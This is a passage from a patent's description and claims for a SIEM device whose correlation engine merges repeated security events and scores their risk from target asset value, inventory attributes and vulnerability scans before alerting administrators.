SIEM devices are useful to an administrator of a large network, which may include hundreds of computing devices distributed among different locations. However, existing SIEM devices collect a large number of logs from the various security devices deployed throughout the enterprise and which may have disparate control and/or inspection functions. These devices may be provided by different manufacturers and generate logs in different formats. When an event, such as an attack on a host of the network, occurs, different security devices may detect the same event and/or capture information regarding the event at different levels or different locations. Additionally, the same event may be reported to the SIEM device by the different security devices. Existing SIEM devices may generate multiple alarms relating to the same event if the SIEM device does not know the correlation of the events reported by different security devices. Moreover, the SIEM device may generate too many alarms when a large number of logs are received.



This problem may be partially solved by setting up priorities for various events so that an alarm may be generated only when an important event occurs. In various embodiments of the present invention, a SIEM device **113** with a correlation engine (not shown) is provided so that events are sorted based on the correlation with asset attributes of the network. The structure and functions of the SIEM device according to one embodiment of the present invention will be described with reference to FIG. **2**.

FIG. **2** illustrates exemplary functional units of a SIEM device **200** in accordance with an embodiment of the present invention. In the embodiment shown in FIG. **2**, SIEM device **200** comprises an event collector **210**, an event database (DB) **220**, a correlation engine **230** and a warning/reporting engine **240**. Event collector **210** is used for receiving original events from security devices deployed in the network that is managed by SIEM device **200**. The original events may be network logs that are recorded and sent by the security devices in real time or periodically. The original events may be network activities that are sensitive or harmful to the security of the network, such as an attack to a web server of the network or an access to a host that is blocked by a firewall based on its policies. The network logs may contain all or a portion of the data packets that trigger the events and/or all or a portion of the data packets preceding and/or following detection of the event. Alternatively, the network logs may contain the most important information regarding the events, including, but not limited to, the source IP addresses, the destination IP addresses, protocols, ports, applications, times of the events and the like.

After the original events are received by event collector **210**, the original events may be stored in event DB **220**. In one embodiment, the original events may be normalized before being stored to event DB **220** since the original events may be sent by security devices of different manufacturers in different format. After normalization, the information that is useful for correlation may be retained and saved to event DB **220** in a unified format. It will be easier for correlation engine **230** to correlate events from different sources after the original events are normalized.

Correlation engine **230** is used for finding the correlations between events and assets of the network. A risk level of an event may be set and adjusted based on an asset value and/or other attributes of the target of the event in the network. If the target of the event is a core asset of the network, the calculated risk level of the event may result in a higher value relative to a calculated risk level of a non-core asset. For example, a web server providing the most important web application for a company would be considered a core asset of the whole network and would typically be assigned a high asset value. When an attack is targeting this web server, the determined risk level of this attack is high and therefore an alarm is more likely to be generated by SIEM device **200**. On the other hand, a client PC within the network would typically be considered a non-core asset of the network or may not even be present in the asset list of the network. When an attack is targeting this client PC, the determined risk level is low and therefore no alarm is sent to the

administrator. The structures and functions of correlation engine will be described further below with reference with FIG. **3**.

Warning/reporting engine **240** is used for sending an alarm or report to the network administrator when the risk level of an event is higher than a predetermined or configurable threshold. The warning may be a syslog sent to a remote terminal or an electronic mail (Email) or Short Message Service (SMS) message sent to the administrator. In one embodiment, the administrator may configure the predetermined threshold and warning policies that define the channels and timing of alarms that should be sent for events with different risk levels.

FIG. **3** illustrates exemplary functional units of a correlation engine **300** in accordance with an embodiment of the present invention. In this embodiment, correlation engine **300** conducts logical correlation, asset correlation, inventory correlation, cross correlation and knowledge correlation and calculates a risk level of an event based on the correlation between the event and asset attributes of a network. In the present example, correlation engine **300** comprises a logical correlation engine **301**, an asset correlation engine **302**, an asset table **303**, an inventory correlation engine **304**, an inventory table **305**, a cross correlation engine **306**, a vulnerability ID DB **307**, a knowledge correlation engine **308**, a knowledge DB **309**, an event table **311** and a correlation policy DB **310**.

Logical correlation engine **301** is used for conducting logical correlation to the original events so that related or repeated events may be combined to one security event. Original events are captured by different security devices at different locations, different network segments and different network layers. In some cases, the same event may be captured and logged by multiple security devices and SIEM device may receive multiple original events for the same events. In some other cases, different events are captured by different security devices and these events may be associated with the same attack. These events relating to the same attack may be connected to form a complete attack procedure. For example, in correlation policy DB **310**, a logical correlation policy may define events having the same source IP address, destination IP address, protocol, port and web application as a repeat event. Another logical policy may define events having the same destination IP address, protocol, port and web application, but different source IP addresses and occurring within a certain period as a related event. Logical correlation engine **301** reads the original events from event DB and logically correlates the original events based on logical correlation policies defined in correlation policy DB **310**. After logical correlation, one security event is extracted from the repeated or related original events and others events may be discarded. Alternatively, instead of extracting one event from repeated or related events, a new security event may be generated to represent the repeated or related original events. The reliability of the new event is higher than the ones it is extracted from. The security events extracted or generated by logical correlation engine **301** is sent to asset correlation engine **302**.

According to one embodiment, asset correlation engine **302** is used for conducting asset correlation among the security events and the assets of a network so that only security events relating to core network assets will generate notifications to the administrator of the network. To conduct the asset correlation, asset table **303** may be setup to register all or a subset of assets (e.g., core assets) of the network. Depending upon the particular implementation, asset table **303** may be created automatically by scanning the network or setup manually by the administrator. In the context of the present example, each asset is provided with an asset value representing the importance of the asset to the network. When a core asset that has a high asset value is under attack, a high risk level is associated with the security event and an alarm is more likely to be generated to warn the administrator. An example of an asset table is shown in Table 1.

TABLE 1

Exemplary Asset Table

| Name | Asset Value | Internal IP | External IP | Domain Name | MAC Address | Loc. |
|---|---|---|---|---|---|---|
| Web Server 1 | 4 | 192.168.1.2 | 66.171.121.34 | www.fortinent.com | 8C-70 . . . | HQ |
| Mail Server 1 | 4 | 192.168.1.3 | 208.91.113.80 | Mail.fortinent.com | 8C-70 . . . | HQ |
| PC 1 | 1 | 192.168.2.1 | | | 8C-70 . . . | B1 |
| PC 2 | 3 | 192.168.2.2 | | | 8C-70 . . . | B2 |

According to one embodiment, when asset correlation engine **302** receives a security event, the destination IP address of the security event is extracted and checked against the IP addresses in asset table **303**. If the destination IP address is not in asset table **303**, it means that the target of the attack is not within the assets of the network or the attack is targeting an asset that is not of concern to the administrator. If the destination IP address is located within asset table **303**, the corresponding asset value is extracted and a risk level of the security event may be calculated based on the asset value. For example, the risk level of an event may be calculated as follows:

$$\text{RiskLevel}[0\sim5]=\text{AssetValue}[0\sim5]*\text{DestructionLevel}[0\sim5]*\text{Reliability}[0\sim10]/50$$

where,

AssetValue is a parameter that represents the importance level of an asset.

DestructionLevel is a parameter that represents destructiveness of a security event. For example, a virus that may cause damage to a computer or network system may be given a high DestructionLevel, while a security event that triggers a firewall policy may be given a low DestructionLevel. Usually, the DestructionLevel is a fixed number and is not adjusted during the procedure of correlation.

Reliability is a parameter that represents the accuracy of the RiskLevel and may be retrieved from knowledge DB the event belongs to. It may be adjusted based on further attributes of the asset. This will be described further below.

It will be apparent to one skilled in the art that RiskLevel may be calculated based on the asset value in other manners, using parameter weightings, for example, as follows:

$$\text{RiskLevel}[0\sim5]=w1*\text{AssetValue}+w2*\text{DestructionLevel}+w3*\text{Reliability}$$

Further, it will be apparent to one skilled in the art that a target of an attack or a security event may be identified by other attributes besides and/or in addition to the destination IP address. For example, when the destination IP address of a security event is an internal IP address that is not a unique IP address in asset table **303**, a path in a Uniform Resource Locator (URL) may be used for identifying the actual server that serves this URL. After the actual server is identified, the corresponding asset value may be exacted to calculate the risk level of the security event.

In one embodiment, after the risk level is calculated by asset correlation engine **302**, it may be further adjusted by inventory correlation engine **304** based on further attributes of the target of a security event. For example, if a MySQL attack is targeting a host that is a core asset of a network, asset correlation engine **302** may assign a high risk level to that attack. However, if the host does not provide MySQL services, the attack will not affect the host and it is not necessary to generate an alarm for that attack even though the target of the attack is a core asset of the network. Therefore, inventory correlation engine **304** may decrease the risk level calculated by the asset correlation engine **302**. Optionally, inventory correlation engine **304** may keep the risk level calculated by the asset correlation engine **302** unchanged if no attributes relating to the security event are found by inventory correlation engine **304**. To register the attributes of an asset and adjust the risk level based on the attributes, inventory table **305** may be created automatically by scanning the network or may be setup manually by the administrator for each asset of the network. Inventory table **305** may contain hardware and software attributes of a particular asset and a reliability value may be given to each attribute in the table to define the reliability that an event affects the particular asset based on the attribute at issue. An exemplary inventory table of a mail server is shown in Table 2.

TABLE 2

Exemplary Inventory Table of a Mail Server

| | Attribute | Reliability |
|---|---|---|
| OS | Windows Server 2012 | 4 |
| Service list | Exchange Server | 3 |
| Protocols list | POP3, SMTP, Exchange | 3 |
| Ports list | 110, 587, 593 | 3 |

According to one embodiment, when a security event and its currently calculated risk level is received, inventory correlation engine **304** may extract attributes related to the security events from a knowledge DB. The knowledge DB may collect and store information, including, but not limited to, services, protocol, ports, firmware, operation systems, patches, plug-ins and the like, that relate to system vulnerabilities, viruses and/or network attacks. Then, inventory correlation engine **304** searches for the attributes relating to the security event in inventory table **305** of the target asset. If an attribute, such as a service, of the security event is in the inventory table **305**, it means that the security event is targeting a particular service that is provided by the target asset. In such a situation, it is more likely that the security event will affect the target and the risk level of the security event should typically be adjusted higher. Therefore, a corresponding reliability value is extracted from inventory table **305** and the risk level of the security event is adjusted accordingly. An individual reliability value for each attribute is provided in Table 2 to adjust the risk level more concisely. It will be apparent to one skilled in the art that the individual reliability value may be omitted and a default value may be used for adjusting the risk level.

Cross correlation engine **306** may further adjust the risk level of the security event based on whether a vulnerability that an attack is targeting exists in the target host. Vulnerability ID DB **307** is used for recording vulnerabilities that are exploited by attacks. Attributes of attacks, including, but not limited to, information contained within the Common Vulnerabilities and Exposures (CVE) system, BugTraq or S3CVE, may be stored in vulnerability ID DB **307**. When a security event is received by cross correlation engine **306**, the corresponding vulnerability of the security event is searched for within vulnerability ID DB **307**. If cross correlation engine **306** can't make a correlation between the attack and vulnerability based on standard attributes, it may use knowledge correlation policy **309** to find the corresponding vulnerability. If a vulnerability ID is not found in vulnerability ID DB **307** and the last scanning task has been finished for a certain period, cross correlation engine **306** may invoke inspection or scanning tools to scan the target host for the corresponding vulnerability. If the cross inspection by the scanning tool shows that the corresponding vulnerability exists in the target host, the risk level will be increased by cross correlation engine **306** by increasing its reliability. Otherwise, the risk level may be decreased or left unchanged.

Further, if no vulnerability can be identified in vulnerability ID DB **307**, knowledge correlation engine **308** may search knowledge DB **309** to find corresponding vulnerabilities related to the attack at issue. If a vulnerability relating to the attack is found in knowledge DB **309**, knowledge correlation engine **308** may invoke inspection or scanning tools to scan the target host for the corresponding vulnerability. If the inspections show that the corresponding vulnerability exists in the target host, the risk level provided by the other correlation engines may be increased by cross correlation engine **306**. Otherwise, the risk level may be decreased or left unchanged.

In the embodiment shown in FIG. **3**, correlation engine **300** comprises multiple sub correlation engines to conduct corresponding correlation processing. However, it is not necessary to conduct every correlation process for every security event. Correlation policy DB **310** is used for defining what correlation processing should be conducted for each type of security event. It is also possible to define the order that the correlation processing is conducted. For example, one correlation policy in correlation policy DB **310** may define that only logical correlation and asset correlation are conducted for a DDoS attack because DDoS attacks usually do not target vulnerabilities of a host. Another correlation policy may specify that all the correlation processing should be conducted for a MySQL attack so that the most accurate risk level may be reported to the administrator.

FIG. **4** is a flow diagram illustrating a method for analyzing correlations of security events in accordance with an embodiment of the present invention. Depending upon the particular implementation, the various process and decision blocks described below may be performed by hardware components, embodied in machine-executable instructions, which may be used to cause a general-purpose or special-purpose processor programmed with the instructions to perform the steps, or the steps may be performed by a combination of hardware, software, firmware and/or involvement of human participation/interaction.

At block **401**, a SIEM device receives original events from data sources. These data sources may be network security devices or other computing devices that are deployed at different locations. The original events may be network logs that are recorded and sent by the security devices or the computing devices in real time or periodically. The original events may be network activities that are sensitive or harmful to the security of the network, such as attacks on a web server of the network or accesses to a host that are blocked by a firewall based on its policies. As noted above, the network logs may contain all or a portion of the data packets that trigger the events and/or all or a portion of the data packets preceding and/or following detection of the event. Alternatively, the network logs may contain the most important information regarding the events, including, but not limited to, the source IP addresses, the destination IP addresses, protocols, ports, applications, times of the events and the like.

At block **402**, the SIEM device conducts logical correlation to the original events based on predetermined logical correlation policies. The original events collected by multiple security devices may be correlated logically. For example, multiple events logged by multiple security devices may actually relate to the same event because all of these security devices captured the same event at different network layers or different locations of the network. Moreover, an attack to a network may last for several hours or a few days. An attack may originate from the same source but target different destinations of the network or originate from different sources but target the same destination. A series of events that are generated from these kinds of attacks may also be correlated. These repeated or related events can be logically correlated based on the original IP addresses, destination IP addresses, protocols, ports, create times and/or the like.

At block **403**, a security event may be extracted from the repeated or related original events that are found by logical correlation or a new security event may be generated to represent the repeated or related original events. By extracting or generating one security event to represent multiple correlated events, the number of events that need further correlation processing will be reduced and more accurate and efficient alarms may be provided.

At block **404**, the SIEM device estimates a risk level of the security event based on correlation of the security event and asset attributes of the network. If the security event is targeting a core network asset that is providing critical services of the network, a high risk level is assigned to the security event. If the target of the security event is not within the network or is not among the core assets, a low risk level is assigned to the security event. The risk level of the security event may also be adjusted based on other attributes of assets of the network. An exemplary procedure for estimating the risk level of a security event will be described in further detail below with reference to FIGS. **5**-**9**.

At block **405**, the SIEM device reports the risk level of the security event to the administrator of network. Optionally, the SIEM device only reports the security event when its risk level is higher than a predetermined or configurable threshold. The administrator may set up policies to configure how to report the security device based on the risk level. The SIEM device may generate and send an alarm Email/SMS/Syslog message to the network administrator or send a syslog message to a remote terminal. By sending out alarms for the events that relate to core assets of a network and filtering out other events, the administrator may focus on the important events even when a large number of security events are collected from the whole network.

FIG. **5** is a flow diagram illustrating a combined correlation processing in accordance with an embodiment of the present invention. In this embodiment, a correlation engine of a SIEM device may conduct multiple correlation processing for a security event and may use multiple asset attributes of a network based on the correlation policies.

At block **501**, when a security event is received by a correlation engine, a corresponding correlation policy may be obtained so that the correlation engine may conduct one or more correlations for the received security event. The SIEM device may receive different kinds of security events and each kind of event may relate to some aspect of the network. For some events, an asset correlation based on whether the events are targeted at the core assets of the network is enough for estimating the risk level of the events. For other events, multiple correlations based on multiple assets attributes of the network are conducted so that the correlation engine may calculate more accurate risk levels. The administrator may configure a correlation policy for each kind of security event to define which correlation processing should be conducted for a security event and how the correlation processing results should be combined.

At block **502**, the correlation engine calculates a risk level of a security event based on asset correlation. In this embodiment, a target of a security event is searched in an asset table of a network. If the target is found in the asset table, an asset value corresponding to the target is extracted and a risk level of the security event is calculated based on the asset value. If the target of the security event has a high asset value (the asset is important to the security of the network or the administrator wants to receive an alarm when the asset is attacked), the resulting calculated risk level of the security event will be a relatively high value. Exemplary asset correlation processing will be described in further detail with reference to FIG. **6**.

At block **503**, the correlation engine may adjust the risk level of the security event based on a reliability value relating to an inventory attribute of the target of the security event when the security event relates to the inventory attribute. Usually, an attack targets a leak or vulnerability that exists in a particular environment, such as a service, a port or an operation system. If the host does not have the particular environment that the attack needs, the attack may not actually harm the host. In such circumstances, the correlation engine may decrease the risk level associated with the attack or keep the risk level unchanged and no alarm will be generated even if the target asset is a core asset of the network. On the other hand, if the target asset does provide the particular environment that the attack needs, it is more likely that the attack may harm the target asset. In such circumstances, the correlation engine may increase the risk level associated with the security event by increasing its reliability, for example. Exemplary inventory correlation processing will be described in further detail below with reference to FIG. **7**.

At block **504**, the correlation engine adjusts the risk level of the security event by checking if a vulnerability that the event targets exists in the target asset by the standard attributes of the event. If the vulnerability does not exist and the last scanning task has been finished for a certain period, the correlation engine may conduct a cross correlation by invoking multiple inspection tools to check if a vulnerability that an attack is targeting exists in the target asset. If any inspection tools find the vulnerability in the target asset, the correlation engine increases the risk level of the attack.

Exemplary cross correlation processing will be described in further detail with reference to FIG. **8**.

At block **505**, the correlation engine adjusts the risk level of the security event by checking if a vulnerability that is known based on knowledge DB exists in the target asset. In one embodiment, the correlation engine conducts a knowledge correlation by invoking multiple inspection tools to check if a vulnerability that an attack is targeting exists in the target asset. If any inspection tools find the vulnerability in the target asset, the correlation engine increases the risk level of the attack. Exemplary knowledge correlation processing will be described in further detail with reference to FIG. **9**.

FIG. **6** is a flow diagram illustrating asset correlation processing in accordance with an embodiment of the present invention.

At block **601**, an asset table is setup to register all or a subset of assets (e.g., core assets) of the network. Asset table may be created automatically by scanning the network or setup manually by the administrator. The asset table may contain the hosts, Websites, network segments or network segment groups of a network that are managed by a SIEM device. The internal IP addresses, external IP addresses, MAC addresses, domain names, services and/or other attributes that may identify the hosts or network segments may be registered in the asset table.

At block **602**, each asset is provided with an asset value that represents the relative importance of the asset within/to the network. Core assets that provide critical services of the network may be given high asset values relative to other non-core assets. When a core asset that has a high asset value is under attack, an alarm is more likely to be generated to warn the administrator.

At block **603**, when asset correlation engine receives a security event, the target of the security event is extracted. The target may be determined by an IP address, domain name and/or service associated with the security event.

At block **604**, the asset correlation engine searches the asset table for the target of the security event to check if the target of the security event is a registered asset of the network.

If the target of the security event is not found in the registered assets of the network, it means that the target of the attack is not within the assets of the network or the attack is targeting an asset that is not of concern or is of relatively little concern to the administrator. A low risk level is given to the security event by the asset correlation engine at block **605**.

If the target of the security event is found within the registered assets, it means that the target of the attack is an asset that is of concern to the administrator. The corresponding asset value of the target in the asset table is extracted at block **606**. A risk level of the security event may be calculated based on the asset value at block **607**.

FIG. **7** is a flow diagram illustrating inventory correlation processing in accordance with an embodiment of the present invention.

At block **701**, an inventory list is setup for each asset of the network to register all or a subset of the attributes (e.g., core attributes) of the asset. Inventory list may be created automatically by scanning each asset of the network or setup manually by the administrator. The inventory list may register the software and hardware environment of an asset, including, but not limited to, services, ports, operating system, Basic Input/Output System (BIOS), software, patches and the like of a host.

At block **702**, each attribute of the inventory table is provided with a reliability value that defines the reliability that a security event will affect the asset based on this attribute. In one embodiment, an attribute that is vulnerable to one or more attacks is given a relatively high reliability value. When an attribute that has a high reliability value exists in the target asset, the risk level of the security event is adjusted to be higher so that an alarm is more likely to be generated to warn the administrator. In other embodiments, a default reliability value may be given to all the attributes to simplify the inventory correlation processing.

At block **703**, when asset correlation engine determines that a target of an attack is within the registered assets of a network, the environment that the attack relies on is further identified. In one embodiment, a knowledge DB may be checked to find out what environment an attack needs to actually harm a host. A list of attributes of attack may be extracted from the knowledge DB.

If the attributes of the attack are not found in the inventory list of the target asset, it means that the target asset of the attack does not possess the environment that the attack relies on and it may not be affected by the attack. As such, the risk level output by the prior correlation process (e.g., the asset correlation engine) may be decreased by the inventory correlation engine at block **705**.

On the other hand, if an attribute of the attack is found in the inventory list of the target asset at block **704**, it means that the target asset does possess the environment needed by the attack and it is more likely be affected by the attack. As such, the corresponding reliability value of the attribute is extracted from the inventory list of the target asset by the inventory correlation engine at block **706** and a risk level of the security event calculated by the prior correlation process (e.g., the asset correlation engine) may be adjusted based on the reliability value at block **707**.

FIG. **8** is a flow diagram illustrating cross correlation processing in accordance with an embodiment of the present invention. In the context of the present example, cross correlation is used for determining if a vulnerability that an attack is targeting exists in the target host. Multiple inspection tools may be invoked to check the target asset for the vulnerability. The results of the inspection tools may be combined to determine if the vulnerability exists in the target asset. By adjusting the risk level of the security event based on whether the vulnerability exists in a target asset, the risk level of the security event may be made more accurate.

At block **801**, a security event is searched for by a cross correlation engine in vulnerability ID DB to determine if a vulnerability in the database is related to the security event.

If a known vulnerability is found in the vulnerability ID DB, multiple inspection tools for the vulnerability may be invoked by the cross correlation engine to scan the target asset at block **802**. The inspection tools may include, but are not limited to, IPS applications, anti-virus applications, Web leak detector applications and other UTM applications. The application processing units may be logical or physical units, encompassing one or more hardware devices or software applications.

At block **803**, the cross correlation engine collects the scanning results from the inspection tools and determines if the system vulnerability exists in the target asset. It will be apparent to one skilled in the art that one or more inspection tools may be used to check a particular vulnerability and results from multiple inspection tools may be used for cross verification of the existence of the vulnerability.

If the vulnerability is not found by the inspection tools, the risk level provided by asset correlation engine or inventory engine may be decreased at block **804**.

If the vulnerability is found by the inspection tools, the risk level provided by asset correlation engine or inventory engine may be increased at block **805**.

FIG. **9** is a flow diagram illustrating knowledge correlation processing in accordance with an embodiment of the present invention. In the context of the present example, knowledge correlation may be used to perform further checking for vulnerabilities in the target host. Usually, if a vulnerability cannot be found in the vulnerability ID DB, knowledge correlation engine may perform further checking with reference to a local, remote or cloud-based knowledge DB to further search corresponding vulnerabilities that may be related to the security event and verify if they exist in the target asset. The risk level of the security event may be further adjusted depending upon the results.

At block **901**, a security event is searched for by a knowledge correlation engine in a knowledge DB to determine if a vulnerability in the knowledge DB is related to the security event. If vulnerability is found in the knowledge DB, multiple inspection tools for the vulnerability are invoked by the knowledge correlation engine for scanning the target asset at block **902**. At block **903**, the knowledge correlation engine collects the scanning results from the inspection tools and determines if the system vulnerability exists in the target asset. If the vulnerability is not found by the inspection tools, the risk level provided by asset correlation engine or inventory engine may be decreased at block **904**. If the vulnerability is found by the inspection tools, the risk level provided by asset correlation engine or inventory engine may be increased at block **905**.

FIG. **10** is an example of a computer system **1000** with which embodiments of the present disclosure may be utilized. Computer system **1000** may represent or form a part of a security device that performs human user verification when a high risk network access is captured.

Embodiments of the present disclosure include various steps, which will be described in more detail below. A variety of these steps may be performed by hardware components or may be tangibly embodied on a computer-readable storage medium in the form of machine-executable instructions, which may be used to cause a general-purpose or special-purpose processor programmed with instructions to perform these steps. Alternatively, the steps may be performed by a combination of hardware, software, and/or firmware.

As shown, computer system **1000** includes a bus **1030**, a processor **1005**, communication port **1010**, a main memory **1015**, a removable storage media **1040**, a read only memory **1020** and a mass storage **1025**. A person skilled in the art will appreciate that computer system **1000** may include more than one processor and communication ports.

Examples of processor **1005** include, but are not limited to, an Intel® Itanium® or Itanium 2 processor(s), or AMD® Opteron® or Athlon MP® processor(s), Motorola® lines of processors, FortiSOC™ system on a chip processors or other future processors. Processor **1005** may include various modules associated with monitoring unit as described in FIGS. **2-4**. Communication port **1010** can be any of an RS-232 port for use with a modem based dialup connection, a 10/100 Ethernet port, a Gigabit or 10 Gigabit port using copper or fiber, a serial port, a parallel port, or other existing or future ports. Communication port **1010** may be chosen depending on a network, such a Local Area Network (LAN), Wide Area Network (WAN), or any network to which computer system **1000** connects.

Memory **1015** can be Random Access Memory (RAM), or any other dynamic storage device commonly known in the art. Read only memory **1020** can be any static storage device(s) such as, but not limited to, a Programmable Read Only Memory (PROM) chips for storing static information such as start-up or BIOS instructions for processor **1005**.

Mass storage **1025** may be any current or future mass storage solution, which can be used to store information and/or instructions. Exemplary mass storage solutions include, but are not limited to, Parallel Advanced Technology Attachment (PATA) or Serial Advanced Technology Attachment (SATA) hard disk drives or solid-state drives (internal or external, e.g., having Universal Serial Bus (USB) and/or Firewire interfaces), such as those available from Seagate (e.g., the Seagate Barracuda 7200 family) or Hitachi (e.g., the Hitachi Deskstar 7K1000), one or more optical discs, Redundant Array of Independent Disks (RAID) storage, such as an array of disks (e.g., SATA arrays), available from various vendors including Dot Hill Systems Corp., LaCie, Nexsan Technologies, Inc. and Enhance Technology, Inc.

Bus **1030** communicatively couples processor(s) **1005** with the other memory, storage and communication blocks. Bus **1030** can be, such as a Peripheral Component Interconnect (PCI)/PCI Extended (PCI-X) bus, Small Computer System Interface (SCSI), USB or the like, for connecting expansion cards, drives and other subsystems as well as other buses, such a front side bus (FSB), which connects processor **1005** to system memory.

Optionally, operator and administrative interfaces, such as a display, keyboard, and a cursor control device, may also be coupled to bus **1030** to support direct operator interaction with computer system **1000**. Other operator and administrative interfaces can be provided through network connections connected through communication port **1010**.

Removable storage media **1040** can be any kind of external hard-drives, floppy drives, IOMEGA® ZIP Drives, Compact Disc-Read Only Memory (CD-ROM), Compact Disc-Re-Writable (CD-RW), Digital Video Disk-Read Only Memory (DVD-ROM).

While embodiments of the invention have been illustrated and described, it will be clear that the invention is not limited to these embodiments only. Numerous modifications, changes, variations, substitutions, and equivalents will be apparent to those skilled in the art, without departing from the spirit and scope of the invention, as described in the claims.

What is claimed is:

**1**. A method comprising:

maintaining, by a security information and event management (SIEM) device associated with a private network, a correlation policy database including a plurality of logical correlation policies defining conditions under which a particular security event observed within the private network is to be classified as a repeat security event of an original security event and defining conditions under which the particular observed security event is to be classified as a related security event of the original security event;

maintaining, by the SIEM device, an asset table containing information regarding a plurality of assets of the private network, wherein the asset table includes for each asset of the plurality of assets an internet protocol

(IP) address of the asset and an asset value representing the relative importance of the asset to the private network;

maintaining, by the SIEM device, a plurality of inventory tables, including an inventory table for each of the plurality of assets, wherein the inventory table for a particular asset of the plurality of assets includes (i) a description of a plurality of attributes, including hardware and software attributes, of the particular asset and (ii) for each attribute of the plurality of attributes a reliability value representing a relative vulnerability to attack of the attribute;

programmatically collecting, by the SIEM device, information regarding a plurality of security events observed within the private network by receiving and processing network logs from a plurality of network security devices associated with the private network, wherein the information regarding the plurality of security events includes for each security event of the plurality of security events a destination IP address identifying an asset of the private network targeted by the security event;

for each security event of the plurality of security events:

reducing a number of the plurality of security events to be processed by

determining whether the security event represents a repeat security event or a related security event by conducting, by the SIEM device, a logical correlation of the security event with other of the plurality of security events including applying a matching logical correlation policy of the plurality of logical correlation policies to the security event; and

when said determining is affirmative, combining the security event with those of the plurality of security events that are related to the security event as specified by the matching logical correlation policy;

calculating, by the SIEM device, a risk level of the security event based on at least a correlation of the security event with one or more asset attributes of an asset of the plurality of assets targeted by the security event by:

identifying the targeted asset by performing a database lookup on the asset table based on the destination IP address of the security event;

retrieving reliability values of one or more asset attributes of the plurality of asset attributes of the targeted asset from an inventory table of the plurality of inventory tables associated with the targeted asset; and

adjusting the risk level based on the retrieved reliability values; and

when the risk level meets a predetermined or configurable threshold, then causing, by the SIEM device, the security event to be reported to an administrator of the private network.

**2**. The method of claim **1**, further comprising decreasing the risk level of the security event if the targeted asset of the security event is not within the asset table.

**3**. The method of claim **1**, further comprising:

matching a system vulnerability with the security event;

scanning the targeted device of the security event for the system vulnerability; and

increasing the risk level of the security event if the system vulnerability exists in the targeted device of the security event; and

decreasing the risk level of the security event if the system vulnerability does not exist in the targeted device of the security event.

**4**. The method of claim **3**, wherein said matching a system vulnerability with the security event further comprises matching the system vulnerability based on a common vulnerabilities and exposures (CVE) attribute, a BugTraq attribute or an S3CVE attribute of the security event.

**5**. The method of claim **3**, wherein said matching a system vulnerability with the security event further comprises matching the system vulnerability with the security event based on a local knowledge database.

**6**. A security information and event management (SIEM) system comprising:

a non-transitory storage device having embodied therein instructions representing a correlation engine; and

one or more processors coupled to the non-transitory storage device and operable to execute the correlation engine to perform a method comprising:

maintaining a correlation policy database including a plurality of logical correlation policies defining conditions under which a particular security event observed within a private network with which the SIEM device is associated is to be classified as a repeat security event of an original security event and defining conditions under which the particular observed security event is to be classified as a related security event of the original security event;

maintaining an asset table containing information regarding a plurality of assets of the private network, wherein the asset table includes for each asset of the plurality of assets an internet protocol (IP) address of the asset and an asset value representing the relative importance of the asset to the private network;

maintaining a plurality of inventory tables, including an inventory table for each of the plurality of assets, wherein the inventory table for a particular asset of the plurality of assets includes (i) a description of a plurality of attributes, including hardware and software attributes, of the particular asset and (ii) for each attribute of the plurality of attributes a reliability value representing a relative vulnerability to attack of the attribute;

programmatically collecting information regarding a plurality of security events observed within the private network by receiving and processing network logs from a plurality of network security devices associated with the private network, wherein the information regarding the plurality of security events includes for each security event of the plurality of security events a destination IP address identifying an asset of the private network targeted by the security event;

for each security event of the plurality of security events:

reducing a number of the plurality of security events to be processed by

determining whether the security event represents a repeat security event or a related security event by conducting, by the SIEM device, a logical correlation of the security event with other of the plurality of security events including applying a matching logical correlation policy of the plurality of logical correlation policies to the security event; and

when said determining is affirmative, combining the security event with those of the plurality of secu-

rity events that are related to the security event as specified by the matching logical correlation policy;

calculating a risk level of the security event based on at least a correlation of the security event with one or more asset attributes of an asset of the plurality of assets targeted by the security event by:

identifying the targeted asset by performing a database lookup on the asset table based on the destination IP address of the security event;

retrieving reliability values of one or more asset attributes of the plurality of asset attributes of the targeted asset from an inventory table of the plurality of inventory tables associated with the targeted asset; and

adjusting the risk level based on the retrieved reliability values; and

when the risk level meets a predetermined or configurable threshold, then causing the security event to be reported to an administrator of the private network.

**7**. The SIEM system of claim **6**, wherein the method further comprises decreasing the risk level of the security event if the targeted asset of the security event is not within the asset table.

**8**. The SIEM system of claim **6**, wherein the method further comprises:

matching a system vulnerability with the security event;

scanning the targeted device of the security event for the system vulnerability; and

increasing the risk level of the security event if the system vulnerability exists in the targeted device of the security event; and

decreasing the risk level of the security event if the system vulnerability does not exist in the targeted device of the security event.

**9**. The SIEM system of claim **8**, wherein said matching a system vulnerability with the security event further comprises matching the system vulnerability based on a common vulnerabilities and exposures (CVE) attribute, a BugTraq attribute or a S3CVE attribute of the security event.

**10**. The SIEM system of claim **8**, wherein said matching a system vulnerability with the security event further comprises matching the system vulnerability with the security event based on a local knowledge database.

**11**. A non-transitory computer-readable storage medium embodying a set of instructions, which when executed by one or more processors of a security information and event management (SIEM) device, causes the one or more processors to perform a method comprising:

maintaining a correlation policy database including a plurality of logical correlation policies defining conditions under which a particular security event observed within a private network with which the SIEM device is associated is to be classified as a repeat security event of an original security event and defining conditions under which the particular observed security event is to be classified as a related security event of the original security event;

maintaining an asset table containing information regarding a plurality of assets of the private network, wherein the asset table includes for each asset of the plurality of assets an internet protocol (IP) address of the asset and an asset value representing the relative importance of the asset to the private network;

maintaining a plurality of inventory tables, including an inventory table for each of the plurality of assets, wherein the inventory table for a particular asset of the plurality of assets includes (i) a description of a plurality of attributes, including hardware and software attributes, of the particular asset and (ii) for each attribute of the plurality of attributes a reliability value representing a relative vulnerability to attack of the attribute;

programmatically collecting information regarding a plurality of security events observed within the private network by receiving and processing network logs from a plurality of network security devices associated with the private network, wherein the information regarding the plurality of security events includes for each security event of the plurality of security events a destination IP address identifying an asset of the private network targeted by the security event;

for each security event of the plurality of security events:

reducing a number of the plurality of security events to be processed by

determining whether the security event represents a repeat security event or a related security event by conducting, by the SIEM device, a logical correlation of the security event with other of the plurality of security events including applying a matching logical correlation policy of the plurality of logical correlation policies to the security event; and

when said determining is affirmative, combining the security event with those of the plurality of security events that are related to the security event as specified by the matching logical correlation policy;

calculating a risk level of the security event based on at least a correlation of the security event with one or more asset attributes of an asset of the plurality of assets targeted by the security event by:

identifying the targeted asset by performing a database lookup on the asset table based on the destination IP address of t security event;

retrieving reliability values of one or more asset attribute of the plurality of asset attributes of the targeted asset from an inventory table of the plurality of inventory tables associated with the targeted asset; and

adjusting the risk level based on the retrieved reliability values; and

when the risk level meets a predetermined or configurable threshold, then causing the security event to be reported to an administrator of the private network.

**12**. The non-transitory computer-readable storage medium of claim **11**, wherein the method further comprises decreasing the risk level of the security event if the targeted asset of the security event is not within the asset table.

